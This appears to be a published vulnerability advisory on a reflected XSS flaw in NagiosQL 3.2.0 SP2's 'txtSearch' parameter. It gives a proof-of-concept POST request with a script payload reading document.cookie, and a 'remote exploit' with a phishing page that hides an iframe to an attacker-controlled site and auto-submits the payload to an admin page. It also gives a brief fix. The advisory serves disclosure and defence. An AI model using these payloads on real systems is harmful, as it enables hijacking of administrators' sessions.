I. VULNERABILITY ------------------------- Reflected XSS Attacks XSS vulnerabilities in NagiosQL 3.2.0 Servicepack 2 II. BACKGROUND ------------------------- NagiosQL is a web based administration tool designed for Nagios, but might also work with forks. It helps you to easily build a complex configuration with all options, manage and use them. NagiosQL is based on a webserver with PHP, MySQL and local file or remote access to the Nagios configuration files. III. DESCRIPTION ------------------------- Has been detected a Reflected XSS vulnerability in NagiosQL in all pages that containing input for search, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. The code injection is done through the parameter "txtSearch" in all pages IV. PROOF OF CONCEPT ------------------------- The application does not validate the parameter ?txtSearch? correctly. Malicious Request ("txtSearch") Vulnerable: POST /nagiosql/admin/hostdependencies.php HTTP/1.1 Host: 10.0.1.120 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://10.0.1.120/nagiosql/admin/hostdependencies.php Cookie: PHPSESSID=hhr9lv77k9d4vvh0cauco48206 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 198 txtSearch=aaaa%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F script%3E&modus=checkform&hidModify=&hidListId=&hidLimit=0&hidSortBy=1 &hidSortDir=ASC&hidSort=0&selModify=none&selTargetDomain=1HTTP/1.1 200 OK Date: Wed, 30 Oct 2013 16:15:34 GMT Server: Apache/2.2.16 (Debian) X-Powered-By: PHP/5.3.3-7+squeeze17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre- check=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3440 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/htmlV. BUSINESS IMPACT ------------------------- An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED ------------------------- NagiosQL test only 3.2.0 Servicepack 2 ` VII. SOLUTION ------------------------- All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated . After click in search. VIII. REMOTE EXPLOIT ----------------------------- Are two pages an that user access and another contains code for send via post the XSS Send phishing email For administrator for a page with follow code: Name: page.html <html> <body> <H1>BLAH BLAH BLAH</H1> <p>Your bases are not belong to me, dun worry bro</p> <? if (isset($_GET["done"])) { die(); }?><iframe src="http://yoursite.com/xss/index.php" width="1" height="1" frameborder="0"></iframe> </body> </html> Name: index.php <html> <head> <style> .xss {display: none; } </style> </head> <body onload="XSS.submit();"> <form id="xss" action="http://sitevictim/nagiosql/admin/hosts.php" method="post" name="XSS"> <input name="txtSearch" value=""><script>alert(document.cookie);</script>"</input> </form> </body> </html> BY F3nr1r (William Costa) william.costa@gmail.com REFERENCES http://cwe.mitre.org/data/definitions/79.html http://www.nagiosql.org/ http://www.nagiosql.org/forum8/solved-issues/3270-security-hotfix-for-%20nagiosql-3-2-sp2.html#3690